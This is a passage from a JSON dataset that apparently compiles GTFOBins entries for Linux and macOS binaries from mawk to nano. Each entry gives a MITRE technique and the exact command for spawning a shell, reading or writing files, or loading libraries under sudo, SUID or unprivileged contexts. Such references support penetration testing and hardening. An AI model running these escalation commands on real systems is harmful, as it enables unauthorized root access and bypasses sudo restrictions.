{system(\"/bin/sh\")}'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mawk/"]},{"id":"gtfo:minicom:shell:0:sudo","toolId":"gtfo:minicom","toolName":"minicom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"minicom -D /dev/null","description":"Start the following command to open the TUI interface, then:\n\n1. press `Ctrl-A o` and select `Filenames and paths`;\n2. press `e`, type `/bin/sh`, then `Enter`;\n3. Press `Esc` twice;\n4. Press `Ctrl-A k` to drop the shell.\n\nAfter the shell, exit with `Ctrl-A x`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/minicom/"]},{"id":"gtfo:minicom:shell:0:suid","toolId":"gtfo:minicom","toolName":"minicom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"minicom -D /dev/null","description":"Start the following command to open the TUI interface, then:\n\n1. press `Ctrl-A o` and select `Filenames and paths`;\n2. press `e`, type `/bin/sh -p`, then `Enter`;\n3. Press `Esc` twice;\n4. Press `Ctrl-A k` to drop the shell.\n\nAfter the shell, exit with `Ctrl-A x`.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/minicom/"]},{"id":"gtfo:minicom:shell:0:unprivileged","toolId":"gtfo:minicom","toolName":"minicom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"minicom -D /dev/null","description":"Start the following command to open the TUI interface, then:\n\n1. press `Ctrl-A o` and select `Filenames and paths`;\n2. press `e`, type `/bin/sh`, then `Enter`;\n3. Press `Esc` twice;\n4. Press `Ctrl-A k` to drop the shell.\n\nAfter the shell, exit with `Ctrl-A x`.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/minicom/"]},{"id":"gtfo:minicom:shell:1:sudo","toolId":"gtfo:minicom","toolName":"minicom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '! exec /bin/sh </dev/tty 1>/dev/tty 2>/dev/tty' >/path/to/temp-file\nminicom -D /dev/null -S /path/to/temp-file\nreset^J","description":"After the shell, exit with `Ctrl-A x`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/minicom/"]},{"id":"gtfo:minicom:shell:1:suid","toolId":"gtfo:minicom","toolName":"minicom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '! exec /bin/sh </dev/tty 1>/dev/tty 2>/dev/tty' >/path/to/temp-file\nminicom -D /dev/null -S /path/to/temp-file\nreset^J","description":"After the shell, exit with `Ctrl-A x`.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/minicom/"]},{"id":"gtfo:minicom:shell:1:unprivileged","toolId":"gtfo:minicom","toolName":"minicom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '! exec /bin/sh </dev/tty 1>/dev/tty 2>/dev/tty' >/path/to/temp-file\nminicom -D /dev/null -S /path/to/temp-file\nreset^J","description":"After the shell, exit with `Ctrl-A x`.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/minicom/"]},{"id":"gtfo:more:file-read:0:sudo","toolId":"gtfo:more","toolName":"more","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"more /path/to/input-file","description":"The file is displayed in the terminal interface.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/more/"]},{"id":"gtfo:more:file-read:0:suid","toolId":"gtfo:more","toolName":"more","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"more /path/to/input-file","description":"The file is displayed in the terminal interface.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/more/"]},{"id":"gtfo:more:file-read:0:unprivileged","toolId":"gtfo:more","toolName":"more","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"more /path/to/input-file","description":"The file is displayed in the terminal interface.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/more/"]},{"id":"gtfo:more:shell:0:sudo","toolId":"gtfo:more","toolName":"more","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"more /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/more/"]},{"id":"gtfo:more:shell:0:suid","toolId":"gtfo:more","toolName":"more","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"more /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/more/"]},{"id":"gtfo:more:shell:0:unprivileged","toolId":"gtfo:more","toolName":"more","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"more /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/more/"]},{"id":"gtfo:mosh-server:shell:0:sudo","toolId":"gtfo:mosh-server","toolName":"mosh-server","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mosh --server=mosh-server localhost /bin/sh","description":"The `mosh-server` has to be executed via `sudo`, e.g., `'--server=sudo mosh-server'`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mosh-server/"]},{"id":"gtfo:mosquitto:file-read:0:sudo","toolId":"gtfo:mosquitto","toolName":"mosquitto","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mosquitto -c /path/to/input-file","description":"The file is actually parsed and the first wrong line (ending with a newline or a null character) is returned in an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mosquitto/"]},{"id":"gtfo:mosquitto:file-read:0:suid","toolId":"gtfo:mosquitto","toolName":"mosquitto","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mosquitto -c /path/to/input-file","description":"The file is actually parsed and the first wrong line (ending with a newline or a null character) is returned in an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mosquitto/"]},{"id":"gtfo:mosquitto:file-read:0:unprivileged","toolId":"gtfo:mosquitto","toolName":"mosquitto","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"mosquitto -c /path/to/input-file","description":"The file is actually parsed and the first wrong line (ending with a newline or a null character) is returned in an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mosquitto/"]},{"id":"gtfo:mount:privilege-escalation:0:sudo","toolId":"gtfo:mount","toolName":"mount","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"mount -o bind /bin/sh /bin/mount\nmount","description":"This overrides `mount` itself with a shell (or any other executable).","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mount/"]},{"id":"gtfo:msfconsole:inherit:0:sudo","toolId":"gtfo:msfconsole","toolName":"msfconsole","name":"inherit ← irb","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["inherit"],"command":"msfconsole\nirb","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msfconsole/"]},{"id":"gtfo:msfconsole:inherit:0:unprivileged","toolId":"gtfo:msfconsole","toolName":"msfconsole","name":"inherit ← irb","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["inherit"],"command":"msfconsole\nirb","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msfconsole/"]},{"id":"gtfo:msgattrib:file-read:0:sudo","toolId":"gtfo:msgattrib","toolName":"msgattrib","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgattrib -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msgattrib/"]},{"id":"gtfo:msgattrib:file-read:0:suid","toolId":"gtfo:msgattrib","toolName":"msgattrib","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgattrib -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msgattrib/"]},{"id":"gtfo:msgattrib:file-read:0:unprivileged","toolId":"gtfo:msgattrib","toolName":"msgattrib","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"msgattrib -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msgattrib/"]},{"id":"gtfo:msgcat:file-read:0:sudo","toolId":"gtfo:msgcat","toolName":"msgcat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgcat -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msgcat/"]},{"id":"gtfo:msgcat:file-read:0:suid","toolId":"gtfo:msgcat","toolName":"msgcat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgcat -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msgcat/"]},{"id":"gtfo:msgcat:file-read:0:unprivileged","toolId":"gtfo:msgcat","toolName":"msgcat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"msgcat -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msgcat/"]},{"id":"gtfo:msgconv:file-read:0:sudo","toolId":"gtfo:msgconv","toolName":"msgconv","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgconv -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msgconv/"]},{"id":"gtfo:msgconv:file-read:0:suid","toolId":"gtfo:msgconv","toolName":"msgconv","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgconv -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msgconv/"]},{"id":"gtfo:msgconv:file-read:0:unprivileged","toolId":"gtfo:msgconv","toolName":"msgconv","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"msgconv -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msgconv/"]},{"id":"gtfo:msgfilter:file-read:0:sudo","toolId":"gtfo:msgfilter","toolName":"msgfilter","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgfilter -P -i /path/to/input-file /bin/cat","description":"The file is parsed and displayed as a Java `.properties` file. `/bin/cat` can be replaced with any other *filter* program.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msgfilter/"]},{"id":"gtfo:msgfilter:file-read:0:suid","toolId":"gtfo:msgfilter","toolName":"msgfilter","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgfilter -P -i /path/to/input-file /bin/cat","description":"The file is parsed and displayed as a Java `.properties` file. `/bin/cat` can be replaced with any other *filter* program.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msgfilter/"]},{"id":"gtfo:msgfilter:file-read:0:unprivileged","toolId":"gtfo:msgfilter","toolName":"msgfilter","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"msgfilter -P -i /path/to/input-file /bin/cat","description":"The file is parsed and displayed as a Java `.properties` file. `/bin/cat` can be replaced with any other *filter* program.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msgfilter/"]},{"id":"gtfo:msgfilter:shell:0:sudo","toolId":"gtfo:msgfilter","toolName":"msgfilter","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo x | msgfilter -P /bin/sh -c '/bin/sh 0<&2 1>&2; kill $PPID'","description":"The `kill` command is needed to spawn the shell only once. Instead of readinf from standard input, it can read files passed via the `-i` option.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msgfilter/"]},{"id":"gtfo:msgfilter:shell:0:suid","toolId":"gtfo:msgfilter","toolName":"msgfilter","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo x | msgfilter -P /bin/sh -p -c '/bin/sh -p 0<&2 1>&2; kill $PPID'","description":"The `kill` command is needed to spawn the shell only once. Instead of readinf from standard input, it can read files passed via the `-i` option.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msgfilter/"]},{"id":"gtfo:msgfilter:shell:0:unprivileged","toolId":"gtfo:msgfilter","toolName":"msgfilter","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo x | msgfilter -P /bin/sh -c '/bin/sh 0<&2 1>&2; kill $PPID'","description":"The `kill` command is needed to spawn the shell only once. Instead of readinf from standard input, it can read files passed via the `-i` option.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msgfilter/"]},{"id":"gtfo:msgmerge:file-read:0:sudo","toolId":"gtfo:msgmerge","toolName":"msgmerge","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgmerge -P /path/to/input-file /dev/null","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msgmerge/"]},{"id":"gtfo:msgmerge:file-read:0:suid","toolId":"gtfo:msgmerge","toolName":"msgmerge","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgmerge -P /path/to/input-file /dev/null","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msgmerge/"]},{"id":"gtfo:msgmerge:file-read:0:unprivileged","toolId":"gtfo:msgmerge","toolName":"msgmerge","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"msgmerge -P /path/to/input-file /dev/null","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msgmerge/"]},{"id":"gtfo:msguniq:file-read:0:sudo","toolId":"gtfo:msguniq","toolName":"msguniq","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msguniq -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msguniq/"]},{"id":"gtfo:msguniq:file-read:0:suid","toolId":"gtfo:msguniq","toolName":"msguniq","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msguniq -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msguniq/"]},{"id":"gtfo:msguniq:file-read:0:unprivileged","toolId":"gtfo:msguniq","toolName":"msguniq","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"msguniq -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msguniq/"]},{"id":"gtfo:mtr:file-read:0:sudo","toolId":"gtfo:mtr","toolName":"mtr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mtr --raw -F /path/to/input-file","description":"The file is actually parsed, thus the content is corrupted by error prints.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mtr/"]},{"id":"gtfo:mtr:file-read:0:unprivileged","toolId":"gtfo:mtr","toolName":"mtr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"mtr --raw -F /path/to/input-file","description":"The file is actually parsed, thus the content is corrupted by error prints.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mtr/"]},{"id":"gtfo:multitime:shell:0:sudo","toolId":"gtfo:multitime","toolName":"multitime","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"multitime /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/multitime/"]},{"id":"gtfo:multitime:shell:0:suid","toolId":"gtfo:multitime","toolName":"multitime","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"multitime /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/multitime/"]},{"id":"gtfo:multitime:shell:0:unprivileged","toolId":"gtfo:multitime","toolName":"multitime","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"multitime /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/multitime/"]},{"id":"gtfo:mutt:file-read:0:sudo","toolId":"gtfo:mutt","toolName":"mutt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mutt -F /path/to/input-file","description":"The file is leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mutt/"]},{"id":"gtfo:mutt:file-read:0:unprivileged","toolId":"gtfo:mutt","toolName":"mutt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"mutt -F /path/to/input-file","description":"The file is leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mutt/"]},{"id":"gtfo:mv:file-write:0:sudo","toolId":"gtfo:mv","toolName":"mv","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nmv /path/to/temp-file /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mv/"]},{"id":"gtfo:mv:file-write:0:suid","toolId":"gtfo:mv","toolName":"mv","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nmv /path/to/temp-file /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mv/"]},{"id":"gtfo:mv:file-write:0:unprivileged","toolId":"gtfo:mv","toolName":"mv","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\nmv /path/to/temp-file /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mv/"]},{"id":"gtfo:mv:privilege-escalation:0:sudo","toolId":"gtfo:mv","toolName":"mv","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"mv /path/to/input-file /path/to/output-file","description":"This can be used to move and then read or write files from a restricted file systems or with elevated privileges.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mv/"]},{"id":"gtfo:mv:privilege-escalation:0:suid","toolId":"gtfo:mv","toolName":"mv","name":"privilege-escalation","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"mv /path/to/input-file /path/to/output-file","description":"This can be used to move and then read or write files from a restricted file systems or with elevated privileges.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mv/"]},{"id":"gtfo:mypy:file-read:0:sudo","toolId":"gtfo:mypy","toolName":"mypy","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mypy /path/to/input-file","description":"Partial content is leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mypy/"]},{"id":"gtfo:mypy:file-read:0:unprivileged","toolId":"gtfo:mypy","toolName":"mypy","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"mypy /path/to/input-file","description":"Partial content is leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mypy/"]},{"id":"gtfo:mypy:file-write:0:sudo","toolId":"gtfo:mypy","toolName":"mypy","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"mypy /path/to/input-file --junit-xml /path/to/output-file","description":"Partial content is leaked as error messages inside some XML tags.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mypy/"]},{"id":"gtfo:mypy:file-write:0:unprivileged","toolId":"gtfo:mypy","toolName":"mypy","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"mypy /path/to/input-file --junit-xml /path/to/output-file","description":"Partial content is leaked as error messages inside some XML tags.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mypy/"]},{"id":"gtfo:mysql:library-load:0:sudo","toolId":"gtfo:mysql","toolName":"mysql","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"mysql --default-auth ../../../../../path/to/lib","description":"The following loads the `/path/to/lib.so` shared object.","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mysql/"]},{"id":"gtfo:mysql:library-load:0:suid","toolId":"gtfo:mysql","toolName":"mysql","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"mysql --default-auth ../../../../../path/to/lib","description":"The following loads the `/path/to/lib.so` shared object.","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mysql/"]},{"id":"gtfo:mysql:library-load:0:unprivileged","toolId":"gtfo:mysql","toolName":"mysql","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"mysql --default-auth ../../../../../path/to/lib","description":"The following loads the `/path/to/lib.so` shared object.","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mysql/"]},{"id":"gtfo:mysql:shell:0:sudo","toolId":"gtfo:mysql","toolName":"mysql","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mysql -e '\\! /bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mysql/"]},{"id":"gtfo:mysql:shell:0:suid","toolId":"gtfo:mysql","toolName":"mysql","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mysql -e '\\! /bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mysql/"]},{"id":"gtfo:mysql:shell:0:unprivileged","toolId":"gtfo:mysql","toolName":"mysql","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"mysql -e '\\! /bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mysql/"]},{"id":"gtfo:nano:file-read:0:sudo","toolId":"gtfo:nano","toolName":"nano","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nano /path/to/input-file","description":"The file content is displayed in the terminal interface.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nano/"]},{"id":"gtfo:nano:file-read:0:suid","toolId":"gtfo:nano","toolName":"nano","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nano /path/to/input-file","description":"The file content is displayed in the terminal interface.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nano/"]},{"id":"gtfo:nano:file-read:0:unprivileged","toolId":"gtfo:nano","toolName":"nano","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nano /path/to/input-file","description":"The file content is displayed in the terminal interface.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nano/"]},{"id":"gtfo:nano:file-write:0:sudo","toolId":"gtfo:nano","toolName":"nano","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"nano /path/to/output-file\nDATA\n^O","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nano/"]},{"id":"gtfo:nano:file-write:0:suid","toolId":"gtfo:nano","toolName":"nano","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"nano /path/to/output-file\nDATA\n^O","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nano/"]},{"id":"gtfo:nano:file-write:0:unprivileged","toolId":"gtfo:nano","toolName":"nano","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"nano /path/to/output-file\nDATA\n^O","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nano/"]},{"id":"gtfo:nano:shell:0:sudo","toolId":"gtfo:nano","toolName":"nano","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nano\n^R^X\nreset; sh 1>&0 2>&0","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nano/"]},{"id":"gtfo:nano:shell:0:suid","toolId":"gtfo:nano","toolName":"nano","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nano\n^R^X\nreset; sh 1>&0 2>&0","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nano/"]},{"id":"gtfo:nano:shell:0:unprivileged","toolId":"gtfo:nano","toolName":"nano","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"nano\n^R^X\nreset; sh 1>&0 